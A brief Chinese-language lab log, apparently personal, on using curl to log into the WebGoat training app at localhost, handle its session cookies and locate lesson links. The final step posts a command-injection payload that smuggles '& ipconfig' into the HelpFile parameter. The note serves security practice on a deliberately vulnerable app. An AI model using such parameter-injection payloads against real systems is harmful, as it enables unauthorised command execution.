這個WebGoat有一些個性化的操作,所以記錄在此
步驟:
1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack" -v
登錄進入WebGoat,並保存COOKIE
2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v
提交start = Start WebGoat的表單,進入WebGoat的主頁面。
此時,應該查看頁面源代碼中你想點的鏈接是什麼,
如:
<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>
注意: WebGoat對不同的COOKIE,返回的頁面鏈接並不相同,如果在後面的步驟中,你訪問的是瀏覽器裏查看到的鏈接,很可能那個鏈接就不存在,返回的是主頁中的介紹信息,而不是你想訪問的鏈接的內容。
另外,由於WebGoat是使用NTLM認證協議,所以每次curl,都得帶-u "guest:guest"
3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v
這樣就可以訪問到你想訪問的鏈接了。
4、如果要實現命令注入,提交如下:
curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html